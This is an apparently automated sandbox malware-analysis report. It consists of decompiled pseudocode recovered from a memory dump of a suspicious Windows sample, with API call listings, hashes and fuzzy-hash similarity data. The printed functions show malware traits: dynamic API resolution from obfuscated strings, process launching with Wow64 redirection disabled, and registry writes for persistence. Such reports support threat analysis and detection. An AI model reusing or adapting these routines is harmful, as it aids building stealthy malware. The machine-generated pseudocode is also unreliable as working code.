                                • Opcode ID: ce194bc5ac3adf05cb2be9bc6e5db1822f71a4821922f29bc683cf0cbedfe0c1
                                • Instruction ID: f06111be71a4598db533b17fa120869e9aecd1b49389ded3016b0959d00baa4a
                                • Opcode Fuzzy Hash: ce194bc5ac3adf05cb2be9bc6e5db1822f71a4821922f29bc683cf0cbedfe0c1
                                • Instruction Fuzzy Hash: D6A13871620109AFDB11EFA8FC8DE9A7FA9FF49320B144035FA09C7290DB759950DBA0
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 27%
                                			E052F5927(intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, intOrPtr* _a16, intOrPtr* _a20) {
                                				intOrPtr _v8;
                                				intOrPtr _v12;
                                				long _v16;
                                				intOrPtr _v20;
                                				signed int _v24;
                                				void* __esi;
                                				long _t43;
                                				intOrPtr _t44;
                                				intOrPtr _t46;
                                				void* _t48;
                                				void* _t49;
                                				void* _t50;
                                				intOrPtr _t54;
                                				intOrPtr _t57;
                                				void* _t58;
                                				void* _t59;
                                				void* _t60;
                                				intOrPtr _t66;
                                				void* _t71;
                                				void* _t74;
                                				intOrPtr _t75;
                                				void* _t77;
                                				intOrPtr _t79;
                                				intOrPtr* _t80;
                                				intOrPtr _t91;
                                
                                				_t79 =  *0x52fa38c; // 0x7459ba0
                                				_v24 = 8;
                                				_t43 = GetTickCount();
                                				_push(5);
                                				_t74 = 0xa;
                                				_v16 = _t43;
                                				_t44 = E052F4E1B(_t74,  &_v16);
                                				_v8 = _t44;
                                				if(_t44 == 0) {
                                					_v8 = 0x52f91ac;
                                				}
                                				_t46 = E052F42F0(_t79);
                                				_v12 = _t46;
                                				if(_t46 != 0) {
                                					_t80 = __imp__;
                                					_t48 =  *_t80(_v8, _t71);
                                					_t49 =  *_t80(_v12);
                                					_t50 =  *_t80(_a4);
                                					_t54 = E052F6837(lstrlenW(_a8) + _t48 + _t48 + _t49 + _t50 + lstrlenW(_a8) + _t48 + _t48 + _t49 + _t50 + 0x102);
                                					_v20 = _t54;
                                					if(_t54 != 0) {
                                						_t75 =  *0x52fa2d4; // 0x215d5a8
                                						_t16 = _t75 + 0x52fbaa8; // 0x530025
                                						 *0x52fa138(_t54, _t16, _v8, _v8, _a4, _v12, _a8);
                                						_push(4);
                                						_t77 = 5;
                                						_t57 = E052F4E1B(_t77,  &_v16);
                                						_v8 = _t57;
                                						if(_t57 == 0) {
                                							_v8 = 0x52f91b0;
                                						}
                                						_t58 =  *_t80(_v8);
                                						_t59 =  *_t80(_v12);
                                						_t60 =  *_t80(_a4);
                                						_t91 = E052F6837(lstrlenW(_a12) + _t58 + _t58 + _t59 + _t60 + lstrlenW(_a12) + _t58 + _t58 + _t59 + _t60 + 0x13a);
                                						if(_t91 == 0) {
                                							E052F50CA(_v20);
                                						} else {
                                							_t66 =  *0x52fa2d4; // 0x215d5a8
                                							_t31 = _t66 + 0x52fbbc8; // 0x73006d
                                							 *0x52fa138(_t91, _t31, _v8, _v8, _a4, _v12, _a12);
                                							 *_a16 = _v20;
                                							_v24 = _v24 & 0x00000000;
                                							 *_a20 = _t91;
                                						}
                                					}
                                					E052F50CA(_v12);
                                				}
                                				return _v24;
                                			}


                                APIs
                                • GetTickCount.KERNEL32 ref: 052F593C
                                • lstrlen.KERNEL32(?,80000002,00000005), ref: 052F597C
                                • lstrlen.KERNEL32(00000000), ref: 052F5985
                                • lstrlen.KERNEL32(00000000), ref: 052F598C
                                • lstrlenW.KERNEL32(80000002), ref: 052F5999
                                • lstrlen.KERNEL32(?,00000004), ref: 052F59F9
                                • lstrlen.KERNEL32(?), ref: 052F5A02
                                • lstrlen.KERNEL32(?), ref: 052F5A09
                                • lstrlenW.KERNEL32(?), ref: 052F5A10
                                  • Part of subcall function 052F50CA: HeapFree.KERNEL32(00000000,00000000,052F4239,00000000,00000001,?,00000000,?,?,?,052F6B8D,00000000,?,00000001), ref: 052F50D6
                                Memory Dump Source
                                • Source File: 00000006.00000002.409924400.00000000052F1000.00000020.00000001.sdmp, Offset: 052F0000, based on PE: true
                                • Associated: 00000006.00000002.409916806.00000000052F0000.00000004.00000001.sdmp
                                • Associated: 00000006.00000002.409937275.00000000052F9000.00000002.00000001.sdmp
                                • Associated: 00000006.00000002.409958443.00000000052FA000.00000004.00000001.sdmp
                                • Associated: 00000006.00000002.409970762.00000000052FC000.00000002.00000001.sdmp
                                Similarity
                                • API ID: lstrlen$CountFreeHeapTick
                                • String ID:
                                • API String ID: 2535036572-0
                                • Opcode ID: cc904542efb73d4e78f800e30440887053419e4ed4cff12f9d2f109e75797be6
                                • Instruction ID: f0021e3af0dac149e7e73737ead1bc828b971ae8528e5875c04ff9cd06e81df9
                                • Opcode Fuzzy Hash: cc904542efb73d4e78f800e30440887053419e4ed4cff12f9d2f109e75797be6
                                • Instruction Fuzzy Hash: B3413C72A10219EBCF11AFA4EC49E9EBBB5FF44314F050064FE08A7251D7359A64DF90
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 61%
                                			E052F51A8(void* __eax, void* __ecx) {
                                				long _v8;
                                				void* _v12;
                                				void* _v16;
                                				void* _v28;
                                				long _v32;
                                				void _v104;
                                				char _v108;
                                				long _t39;
                                				intOrPtr _t43;
                                				intOrPtr _t50;
                                				void* _t52;
                                				intOrPtr _t53;
                                				void* _t61;
                                				intOrPtr* _t66;
                                				intOrPtr* _t73;
                                				intOrPtr* _t76;
                                
                                				_t1 = __eax + 0x14; // 0x74183966
                                				_t71 =  *_t1;
                                				_t39 = E052F4F5A(__ecx,  *((intOrPtr*)( *_t1 + 0xc)),  &_v12,  &_v16);
                                				_v8 = _t39;
                                				if(_t39 != 0) {
                                					L12:
                                					return _v8;
                                				}
                                				E052F77A4( *((intOrPtr*)(_t71 + 0xc)),  *((intOrPtr*)(_t71 + 8)), _v12);
                                				_t43 = _v12(_v12);
                                				_v8 = _t43;
                                				if(_t43 == 0 && ( *0x52fa2b8 & 0x00000001) != 0) {
                                					_v32 = 0;
                                					asm("stosd");
                                					asm("stosd");
                                					asm("stosd");
                                					_v108 = 0;
                                					memset( &_v104, 0, 0x40);
                                					_t50 =  *0x52fa2d4; // 0x215d5a8
                                					_t18 = _t50 + 0x52fb4a3; // 0x73797325
                                					_t52 = E052F6343(_t18);
                                					_v12 = _t52;
                                					if(_t52 == 0) {
                                						_v8 = 8;
                                					} else {
                                						_t53 =  *0x52fa2d4; // 0x215d5a8
                                						_t20 = _t53 + 0x52fb770; // 0x7458d18
                                						_t21 = _t53 + 0x52fb0af; // 0x4e52454b
                                						_t66 = GetProcAddress(GetModuleHandleA(_t21), _t20);
                                						if(_t66 == 0) {
                                							_v8 = 0x7f;
                                						} else {
                                							_t73 = __imp__;
                                							_v108 = 0x44;
                                							 *_t73(0);
                                							_t61 =  *_t66(0, _v12, 0, 0, 0, 0x4000000, 0, 0,  &_v108,  &_v32);
                                							 *_t73(1);
                                							if(_t61 == 0) {
                                								_v8 = GetLastError();
                                							} else {
                                								CloseHandle(_v28);
                                								CloseHandle(_v32);
                                							}
                                						}
                                						HeapFree( *0x52fa290, 0, _v12);
                                					}
                                				}
                                				_t76 = _v16;
                                				 *((intOrPtr*)(_t76 + 0x18))( *((intOrPtr*)(_t76 + 0x1c))( *_t76));
                                				E052F50CA(_t76);
                                				goto L12;
                                			}




















                                APIs
                                  • Part of subcall function 052F4F5A: GetModuleHandleA.KERNEL32(4C44544E,00000020,74183966,00000000,00000000,?,?,?,052F51C4,?,?,?,?,00000000,00000000), ref: 052F4F7F
                                  • Part of subcall function 052F4F5A: GetProcAddress.KERNEL32(00000000,7243775A), ref: 052F4FA1
                                  • Part of subcall function 052F4F5A: GetProcAddress.KERNEL32(00000000,614D775A), ref: 052F4FB7
                                  • Part of subcall function 052F4F5A: GetProcAddress.KERNEL32(00000000,6E55775A), ref: 052F4FCD
                                  • Part of subcall function 052F4F5A: GetProcAddress.KERNEL32(00000000,4E6C7452), ref: 052F4FE3
                                  • Part of subcall function 052F4F5A: GetProcAddress.KERNEL32(00000000,6C43775A), ref: 052F4FF9
                                • memset.NTDLL ref: 052F5212
                                  • Part of subcall function 052F6343: ExpandEnvironmentStringsA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,052F522B,73797325), ref: 052F6354
                                  • Part of subcall function 052F6343: ExpandEnvironmentStringsA.KERNEL32(?,00000000,00000000,00000000), ref: 052F636E
                                • GetModuleHandleA.KERNEL32(4E52454B,07458D18,73797325), ref: 052F5249
                                • GetProcAddress.KERNEL32(00000000), ref: 052F5250
                                • Wow64EnableWow64FsRedirection.KERNEL32(00000000), ref: 052F526A
                                • Wow64EnableWow64FsRedirection.KERNEL32(00000001), ref: 052F5288
                                • CloseHandle.KERNEL32(00000000), ref: 052F5297
                                • CloseHandle.KERNEL32(?), ref: 052F529C
                                • GetLastError.KERNEL32 ref: 052F52A0
                                • HeapFree.KERNEL32(00000000,?), ref: 052F52BC
                                Memory Dump Source
                                • Source File: 00000006.00000002.409924400.00000000052F1000.00000020.00000001.sdmp, Offset: 052F0000, based on PE: true
                                • Associated: 00000006.00000002.409916806.00000000052F0000.00000004.00000001.sdmp
                                • Associated: 00000006.00000002.409937275.00000000052F9000.00000002.00000001.sdmp
                                • Associated: 00000006.00000002.409958443.00000000052FA000.00000004.00000001.sdmp
                                • Associated: 00000006.00000002.409970762.00000000052FC000.00000002.00000001.sdmp
                                Similarity
                                • API ID: AddressProc$HandleWow64$CloseEnableEnvironmentExpandModuleRedirectionStrings$ErrorFreeHeapLastmemset
                                • String ID:
                                • API String ID: 91923200-0
                                • Opcode ID: 2588598a18a4145a7ecdbb4a83a2af3858d2976bd7deaa3932d303573ca18613
                                • Instruction ID: 6de45abc2ebb277df5be8e847fee2a0577b8bdeb12c5fc4882a7b88470d72c56
                                • Opcode Fuzzy Hash: 2588598a18a4145a7ecdbb4a83a2af3858d2976bd7deaa3932d303573ca18613
                                • Instruction Fuzzy Hash: F1315771A20219BFDB119BE4EC4CA9EBFB9FF08310F104165F209A3151D771AA85CBA0
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 64%
                                			E052F624D(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
                                				intOrPtr _v8;
                                				intOrPtr _t9;
                                				intOrPtr _t13;
                                				char* _t28;
                                				void* _t33;
                                				void* _t34;
                                				char* _t36;
                                				void* _t38;
                                				intOrPtr* _t39;
                                				char* _t40;
                                				char* _t42;
                                				char* _t43;
                                
                                				_t34 = __edx;
                                				_push(__ecx);
                                				_t9 =  *0x52fa2d4; // 0x215d5a8
                                				_t1 = _t9 + 0x52fb60c; // 0x253d7325
                                				_t36 = 0;
                                				_t28 = E052F278C(__ecx, _t1);
                                				if(_t28 != 0) {
                                					_t39 = __imp__;
                                					_t13 =  *_t39(_t28, _t38);
                                					_v8 = _t13;
                                					_t6 =  *_t39(_a4) + 1; // 0x7459631
                                					_t40 = E052F6837(_v8 + _t6);
                                					if(_t40 != 0) {
                                						strcpy(_t40, _t28);
                                						_pop(_t33);
                                						__imp__(_t40, _a4);
                                						_t36 = E052F49FE(_t33, _t34, _t40, _a8);
                                						E052F50CA(_t40);
                                						_t42 = E052F7565(StrTrimA(_t36, "="), _t36);
                                						if(_t42 != 0) {
                                							E052F50CA(_t36);
                                							_t36 = _t42;
                                						}
                                						_t43 = E052F52E5(_t36, _t33);
                                						if(_t43 != 0) {
                                							E052F50CA(_t36);
                                							_t36 = _t43;
                                						}
                                					}
                                					E052F50CA(_t28);
                                				}
                                				return _t36;
                                			}
















                                APIs
                                  • Part of subcall function 052F278C: lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,052F6266,253D7325,00000000,00000000,?,00000000,052F70D9), ref: 052F27F3
                                  • Part of subcall function 052F278C: sprintf.NTDLL ref: 052F2814
                                • lstrlen.KERNEL32(00000000,00000000,253D7325,00000000,00000000,?,00000000,052F70D9,00000000,07459630), ref: 052F6278
                                • lstrlen.KERNEL32(00000000,?,00000000,052F70D9,00000000,07459630), ref: 052F6280
                                  • Part of subcall function 052F6837: RtlAllocateHeap.NTDLL(00000000,00000000,052F4197), ref: 052F6843
                                • strcpy.NTDLL ref: 052F6297
                                • lstrcat.KERNEL32(00000000,00000000), ref: 052F62A2
                                  • Part of subcall function 052F49FE: lstrlen.KERNEL32(00000000,00000000,052F70D9,00000000,?,052F62B1,00000000,052F70D9,?,00000000,052F70D9,00000000,07459630), ref: 052F4A0F
                                  • Part of subcall function 052F50CA: HeapFree.KERNEL32(00000000,00000000,052F4239,00000000,00000001,?,00000000,?,?,?,052F6B8D,00000000,?,00000001), ref: 052F50D6
                                • StrTrimA.SHLWAPI(00000000,=,00000000,00000000,052F70D9,?,00000000,052F70D9,00000000,07459630), ref: 052F62BF
                                  • Part of subcall function 052F7565: lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,052F62CB,00000000,?,00000000,052F70D9,00000000,07459630), ref: 052F756F
                                  • Part of subcall function 052F7565: _snprintf.NTDLL ref: 052F75CD
                                Strings
                                Memory Dump Source
                                • Source File: 00000006.00000002.409924400.00000000052F1000.00000020.00000001.sdmp, Offset: 052F0000, based on PE: true
                                • Associated: 00000006.00000002.409916806.00000000052F0000.00000004.00000001.sdmp
                                • Associated: 00000006.00000002.409937275.00000000052F9000.00000002.00000001.sdmp
                                • Associated: 00000006.00000002.409958443.00000000052FA000.00000004.00000001.sdmp
                                • Associated: 00000006.00000002.409970762.00000000052FC000.00000002.00000001.sdmp
                                Similarity
                                • API ID: lstrlen$Heap$AllocateFreeTrim_snprintflstrcatsprintfstrcpy
                                • String ID: =
                                • API String ID: 2864389247-1428090586
                                • Opcode ID: 76d67f855574cb7b465f64cfe82c3d5ecc8339a4e690185fdf6249a2c3c0b450
                                • Instruction ID: 0049a669d3861e181c8a6fbb7e0527cc1aae3500f55f62c1f1f2fd599299c432
                                • Opcode Fuzzy Hash: 76d67f855574cb7b465f64cfe82c3d5ecc8339a4e690185fdf6249a2c3c0b450
                                • Instruction Fuzzy Hash: D811A033B212266747126BA8BC8CCAFBAADEE895603054139FB05A7200DE74D80697E0
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • SysAllocString.OLEAUT32(?), ref: 052F295E
                                • SysAllocString.OLEAUT32(0070006F), ref: 052F2972
                                • SysAllocString.OLEAUT32(00000000), ref: 052F2984
                                • SysFreeString.OLEAUT32(00000000), ref: 052F29E8
                                • SysFreeString.OLEAUT32(00000000), ref: 052F29F7
                                • SysFreeString.OLEAUT32(00000000), ref: 052F2A02
                                Memory Dump Source
                                • Source File: 00000006.00000002.409924400.00000000052F1000.00000020.00000001.sdmp, Offset: 052F0000, based on PE: true
                                • Associated: 00000006.00000002.409916806.00000000052F0000.00000004.00000001.sdmp
                                • Associated: 00000006.00000002.409937275.00000000052F9000.00000002.00000001.sdmp
                                • Associated: 00000006.00000002.409958443.00000000052FA000.00000004.00000001.sdmp
                                • Associated: 00000006.00000002.409970762.00000000052FC000.00000002.00000001.sdmp
                                Similarity
                                • API ID: String$AllocFree
                                • String ID:
                                • API String ID: 344208780-0
                                • Opcode ID: 77a4b754670c69d68869ff898de4f8e53f7cf3f5ce60e42f8fb2e15ca9305059
                                • Instruction ID: 1b5afe1a103310431edd1a816c04921a69e9a9c13017a78af82693fc2521187d
                                • Opcode Fuzzy Hash: 77a4b754670c69d68869ff898de4f8e53f7cf3f5ce60e42f8fb2e15ca9305059
                                • Instruction Fuzzy Hash: A0318B36910609EFDB01DFA8E849A9EBBB6BF49310F104435EE15EB110DB71A906CBA1
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 100%
                                			E052F4F5A(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12) {
                                				intOrPtr _v8;
                                				intOrPtr _t23;
                                				intOrPtr _t26;
                                				_Unknown_base(*)()* _t28;
                                				intOrPtr _t30;
                                				_Unknown_base(*)()* _t32;
                                				intOrPtr _t33;
                                				_Unknown_base(*)()* _t35;
                                				intOrPtr _t36;
                                				_Unknown_base(*)()* _t38;
                                				intOrPtr _t39;
                                				_Unknown_base(*)()* _t41;
                                				intOrPtr _t44;
                                				struct HINSTANCE__* _t48;
                                				intOrPtr _t54;
                                
                                				_t54 = E052F6837(0x20);
                                				if(_t54 == 0) {
                                					_v8 = 8;
                                				} else {
                                					_t23 =  *0x52fa2d4; // 0x215d5a8
                                					_t1 = _t23 + 0x52fb11a; // 0x4c44544e
                                					_t48 = GetModuleHandleA(_t1);
                                					_t26 =  *0x52fa2d4; // 0x215d5a8
                                					_t2 = _t26 + 0x52fb792; // 0x7243775a
                                					_v8 = 0x7f;
                                					_t28 = GetProcAddress(_t48, _t2);
                                					 *(_t54 + 0xc) = _t28;
                                					if(_t28 == 0) {
                                						L8:
                                						E052F50CA(_t54);
                                					} else {
                                						_t30 =  *0x52fa2d4; // 0x215d5a8
                                						_t5 = _t30 + 0x52fb77f; // 0x614d775a
                                						_t32 = GetProcAddress(_t48, _t5);
                                						 *(_t54 + 0x10) = _t32;
                                						if(_t32 == 0) {
                                							goto L8;
                                						} else {
                                							_t33 =  *0x52fa2d4; // 0x215d5a8
                                							_t7 = _t33 + 0x52fb74e; // 0x6e55775a
                                							_t35 = GetProcAddress(_t48, _t7);
                                							 *(_t54 + 0x14) = _t35;
                                							if(_t35 == 0) {
                                								goto L8;
                                							} else {
                                								_t36 =  *0x52fa2d4; // 0x215d5a8
                                								_t9 = _t36 + 0x52fb72e; // 0x4e6c7452
                                								_t38 = GetProcAddress(_t48, _t9);
                                								 *(_t54 + 0x18) = _t38;
                                								if(_t38 == 0) {
                                									goto L8;
                                								} else {
                                									_t39 =  *0x52fa2d4; // 0x215d5a8
                                									_t11 = _t39 + 0x52fb7a2; // 0x6c43775a
                                									_t41 = GetProcAddress(_t48, _t11);
                                									 *(_t54 + 0x1c) = _t41;
                                									if(_t41 == 0) {
                                										goto L8;
                                									} else {
                                										 *((intOrPtr*)(_t54 + 4)) = _a4;
                                										 *((intOrPtr*)(_t54 + 8)) = 0x40;
                                										_t44 = E052F4248(_t54, _a8);
                                										_v8 = _t44;
                                										if(_t44 != 0) {
                                											goto L8;
                                										} else {
                                											 *_a12 = _t54;
                                										}
                                									}
                                								}
                                							}
                                						}
                                					}
                                				}
                                				return _v8;
                                			}



















                                APIs
                                  • Part of subcall function 052F6837: RtlAllocateHeap.NTDLL(00000000,00000000,052F4197), ref: 052F6843
                                • GetModuleHandleA.KERNEL32(4C44544E,00000020,74183966,00000000,00000000,?,?,?,052F51C4,?,?,?,?,00000000,00000000), ref: 052F4F7F
                                • GetProcAddress.KERNEL32(00000000,7243775A), ref: 052F4FA1
                                • GetProcAddress.KERNEL32(00000000,614D775A), ref: 052F4FB7
                                • GetProcAddress.KERNEL32(00000000,6E55775A), ref: 052F4FCD
                                • GetProcAddress.KERNEL32(00000000,4E6C7452), ref: 052F4FE3
                                • GetProcAddress.KERNEL32(00000000,6C43775A), ref: 052F4FF9
                                  • Part of subcall function 052F4248: memset.NTDLL ref: 052F42C7
                                Memory Dump Source
                                • Source File: 00000006.00000002.409924400.00000000052F1000.00000020.00000001.sdmp, Offset: 052F0000, based on PE: true
                                • Associated: 00000006.00000002.409916806.00000000052F0000.00000004.00000001.sdmp
                                • Associated: 00000006.00000002.409937275.00000000052F9000.00000002.00000001.sdmp
                                • Associated: 00000006.00000002.409958443.00000000052FA000.00000004.00000001.sdmp
                                • Associated: 00000006.00000002.409970762.00000000052FC000.00000002.00000001.sdmp
                                Similarity
                                • API ID: AddressProc$AllocateHandleHeapModulememset
                                • String ID:
                                • API String ID: 1886625739-0
                                • Opcode ID: 54f1922ac37054008924feb0f43cd3c82a3e91142564eb9887cc7c6f2b8af156
                                • Instruction ID: a581f6be211b832258a1fdf01eb47cafb1b835558065ac4cf2a62eeb0a5bf1ba
                                • Opcode Fuzzy Hash: 54f1922ac37054008924feb0f43cd3c82a3e91142564eb9887cc7c6f2b8af156
                                • Instruction Fuzzy Hash: 70213CB172024AAFE750DF69F949E6ABBECEF09254B00403AF50AC7641D735E905CFA0
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 88%
                                			E052F1D57(void* __ecx, char* _a8, char _a16, intOrPtr* _a20, char _a24) {
                                				signed int _v8;
                                				char _v12;
                                				signed int* _v16;
                                				char _v284;
                                				void* __esi;
                                				char* _t59;
                                				intOrPtr* _t60;
                                				intOrPtr _t64;
                                				char _t65;
                                				intOrPtr _t68;
                                				intOrPtr _t69;
                                				intOrPtr _t71;
                                				void* _t73;
                                				signed int _t81;
                                				void* _t91;
                                				void* _t92;
                                				char _t98;
                                				signed int* _t100;
                                				intOrPtr* _t101;
                                				void* _t102;
                                
                                				_t92 = __ecx;
                                				_v8 = _v8 & 0x00000000;
                                				_t98 = _a16;
                                				if(_t98 == 0) {
                                					__imp__( &_v284,  *0x52fa38c);
                                					_t91 = 0x80000002;
                                					L6:
                                					_t59 = E052F4AA6( &_v284,  &_v284);
                                					_a8 = _t59;
                                					if(_t59 == 0) {
                                						_v8 = 8;
                                						L29:
                                						_t60 = _a20;
                                						if(_t60 != 0) {
                                							 *_t60 =  *_t60 + 1;
                                						}
                                						return _v8;
                                					}
                                					_t101 = _a24;
                                					if(E052F7702(_t92, _t97, _t101, _t91, _t59) != 0) {
                                						L27:
                                						E052F50CA(_a8);
                                						goto L29;
                                					}
                                					_t64 =  *0x52fa2cc; // 0x7459c98
                                					_t16 = _t64 + 0xc; // 0x7459d8c
                                					_t65 = E052F4AA6(_t64,  *_t16);
                                					_a24 = _t65;
                                					if(_t65 == 0) {
                                						L14:
                                						_t29 = _t101 + 0x14; // 0x102
                                						_t33 = _t101 + 0x10; // 0x3d052f90
                                						if(E052F5F2A(_t97,  *_t33, _t91, _a8,  *0x52fa384,  *((intOrPtr*)( *_t29 + 0x28)),  *((intOrPtr*)( *_t29 + 0x2c))) == 0) {
                                							_t68 =  *0x52fa2d4; // 0x215d5a8
                                							if(_t98 == 0) {
                                								_t35 = _t68 + 0x52fb9e0; // 0x4d4c4b48
                                								_t69 = _t35;
                                							} else {
                                								_t34 = _t68 + 0x52fb9db; // 0x55434b48
                                								_t69 = _t34;
                                							}
                                							if(E052F5927(_t69,  *0x52fa384,  *0x52fa388,  &_a24,  &_a16) == 0) {
                                								if(_t98 == 0) {
                                									_t71 =  *0x52fa2d4; // 0x215d5a8
                                									_t44 = _t71 + 0x52fb86a; // 0x74666f53
                                									_t73 = E052F4AA6(_t44, _t44);
                                									_t99 = _t73;
                                									if(_t73 == 0) {
                                										_v8 = 8;
                                									} else {
                                										_t47 = _t101 + 0x10; // 0x3d052f90
                                										E052F1F7A( *_t47, _t91, _a8,  *0x52fa388, _a24);
                                										_t49 = _t101 + 0x10; // 0x3d052f90
                                										E052F1F7A( *_t49, _t91, _t99,  *0x52fa380, _a16);
                                										E052F50CA(_t99);
                                									}
                                								} else {
                                									_t40 = _t101 + 0x10; // 0x3d052f90
                                									E052F1F7A( *_t40, _t91, _a8,  *0x52fa388, _a24);
                                									_t43 = _t101 + 0x10; // 0x3d052f90
                                									E052F1F7A( *_t43, _t91, _a8,  *0x52fa380, _a16);
                                								}
                                								if( *_t101 != 0) {
                                									E052F50CA(_a24);
                                								} else {
                                									 *_t101 = _a16;
                                								}
                                							}
                                						}
                                						goto L27;
                                					}
                                					_t21 = _t101 + 0x10; // 0x3d052f90
                                					_t81 = E052F6A36( *_t21, _t91, _a8, _t65,  &_v16,  &_v12);
                                					if(_t81 == 0) {
                                						_t100 = _v16;
                                						if(_v12 == 0x28) {
                                							 *_t100 =  *_t100 & _t81;
                                							_t26 = _t101 + 0x10; // 0x3d052f90
                                							E052F5F2A(_t97,  *_t26, _t91, _a8, _a24, _t100, 0x28);
                                						}
                                						E052F50CA(_t100);
                                						_t98 = _a16;
                                					}
                                					E052F50CA(_a24);
                                					goto L14;
                                				}
                                				if(_t98 <= 8 || _t98 + 0x2a >= 0x104 || StrChrA(_a8, 0x5f) != 0) {
                                					goto L29;
                                				} else {
                                					_t97 = _a8;
                                					E052F77A4(_t98, _a8,  &_v284);
                                					__imp__(_t102 + _t98 - 0x117,  *0x52fa38c);
                                					 *((char*)(_t102 + _t98 - 0x118)) = 0x5c;
                                					_t91 = 0x80000003;
                                					goto L6;
                                				}
                                			}
























                                APIs
                                • StrChrA.SHLWAPI(052F30C2,0000005F,00000000,00000000,00000104), ref: 052F1D8A
                                • lstrcpy.KERNEL32(?,?), ref: 052F1DB7
                                  • Part of subcall function 052F4AA6: lstrlen.KERNEL32(?,00000000,07459C98,74ECC740,052F13D0,07459E9D,052F55DE,052F55DE,?,052F55DE,?,63699BC3,E8FA7DD7,00000000), ref: 052F4AAD
                                  • Part of subcall function 052F4AA6: mbstowcs.NTDLL ref: 052F4AD6
                                  • Part of subcall function 052F4AA6: memset.NTDLL ref: 052F4AE8
                                  • Part of subcall function 052F1F7A: lstrlenW.KERNEL32(?,?,?,052F1F20,3D052F90,80000002,052F30C2,052F4106,74666F53,4D4C4B48,052F4106,?,3D052F90,80000002,052F30C2,?), ref: 052F1F9F
                                  • Part of subcall function 052F50CA: HeapFree.KERNEL32(00000000,00000000,052F4239,00000000,00000001,?,00000000,?,?,?,052F6B8D,00000000,?,00000001), ref: 052F50D6
                                • lstrcpy.KERNEL32(?,00000000), ref: 052F1DD9
                                Strings
                                Memory Dump Source
                                • Source File: 00000006.00000002.409924400.00000000052F1000.00000020.00000001.sdmp, Offset: 052F0000, based on PE: true
                                • Associated: 00000006.00000002.409916806.00000000052F0000.00000004.00000001.sdmp
                                • Associated: 00000006.00000002.409937275.00000000052F9000.00000002.00000001.sdmp
                                • Associated: 00000006.00000002.409958443.00000000052FA000.00000004.00000001.sdmp
                                • Associated: 00000006.00000002.409970762.00000000052FC000.00000002.00000001.sdmp
                                Similarity
                                • API ID: lstrcpylstrlen$FreeHeapmbstowcsmemset
                                • String ID: ($\
                                • API String ID: 3924217599-1512714803
                                • Opcode ID: d5e5484891a9eda0abcdf03bda8bc4a469780bbf14842ac67b87dbb0ddcf6310
                                • Instruction ID: 926c2fe204fea5628fe4a3cf24b9c60e84eaf6ed92290f1f51930563ddc93f3d
                                • Opcode Fuzzy Hash: d5e5484891a9eda0abcdf03bda8bc4a469780bbf14842ac67b87dbb0ddcf6310
                                • Instruction Fuzzy Hash: 8B511A7222020AFFDF219F60FD49EAABBBAFF04310F404535FA1992160D7359925DB50
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 32%
                                			E052F6BE1(intOrPtr __eax, intOrPtr __edi, long _a4, intOrPtr _a8) {
                                				intOrPtr _v36;
                                				intOrPtr _v44;
                                				intOrPtr _v48;
                                				intOrPtr _v52;
                                				void _v60;
                                				char _v64;
                                				long _t18;
                                				intOrPtr _t22;
                                				intOrPtr _t23;
                                				long _t29;
                                				intOrPtr _t30;
                                				intOrPtr _t31;
                                				intOrPtr* _t32;
                                
                                				_t30 = __edi;
                                				_t29 = _a4;
                                				_t31 = __eax;
                                				_t18 = E052F2902(_t29, __edi, __eax);
                                				_a4 = _t18;
                                				if(_t18 != 0) {
                                					memset( &_v60, 0, 0x38);
                                					_t22 =  *0x52fa2d4; // 0x215d5a8
                                					_v64 = 0x3c;
                                					if(_a8 == 0) {
                                						_t7 = _t22 + 0x52fb4c8; // 0x70006f
                                						_t23 = _t7;
                                					} else {
                                						_t6 = _t22 + 0x52fb8f8; // 0x750072
                                						_t23 = _t6;
                                					}
                                					_v36 = _t31;
                                					_t32 = __imp__;
                                					_v52 = _t23;
                                					_v48 = _t29;
                                					_v44 = _t30;
                                					 *_t32(0);
                                					_push( &_v64);
                                					if( *0x52fa100() != 0) {
                                						_a4 = _a4 & 0x00000000;
                                					} else {
                                						_a4 = GetLastError();
                                					}
                                					 *_t32(1);
                                				}
                                				return _a4;
                                			}

















                                APIs
                                  • Part of subcall function 052F2902: SysAllocString.OLEAUT32(?), ref: 052F295E
                                  • Part of subcall function 052F2902: SysAllocString.OLEAUT32(0070006F), ref: 052F2972
                                  • Part of subcall function 052F2902: SysAllocString.OLEAUT32(00000000), ref: 052F2984
                                  • Part of subcall function 052F2902: SysFreeString.OLEAUT32(00000000), ref: 052F29E8
                                • memset.NTDLL ref: 052F6C05
                                • Wow64EnableWow64FsRedirection.KERNEL32(00000000), ref: 052F6C41
                                • GetLastError.KERNEL32 ref: 052F6C51
                                • Wow64EnableWow64FsRedirection.KERNEL32(00000001), ref: 052F6C62
                                Strings
                                Memory Dump Source
                                • Source File: 00000006.00000002.409924400.00000000052F1000.00000020.00000001.sdmp, Offset: 052F0000, based on PE: true
                                • Associated: 00000006.00000002.409916806.00000000052F0000.00000004.00000001.sdmp
                                • Associated: 00000006.00000002.409937275.00000000052F9000.00000002.00000001.sdmp
                                • Associated: 00000006.00000002.409958443.00000000052FA000.00000004.00000001.sdmp
                                • Associated: 00000006.00000002.409970762.00000000052FC000.00000002.00000001.sdmp
                                Similarity
                                • API ID: StringWow64$Alloc$EnableRedirection$ErrorFreeLastmemset
                                • String ID: <
                                • API String ID: 593937197-4251816714
                                • Opcode ID: e0574eb05400f21409115a6b9f73a626ef4b2c23513a486053c32c409b40ee8d
                                • Instruction ID: b6860c5ccfc09fddb918ac4ce52b212babfed0317c3f901f178edf9cb002b6a7
                                • Opcode Fuzzy Hash: e0574eb05400f21409115a6b9f73a626ef4b2c23513a486053c32c409b40ee8d
                                • Instruction Fuzzy Hash: 6111FE71910218ABDB00DFA5F88DB99BBB8EF08754F008426FA09E7180D774A544CFA5
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
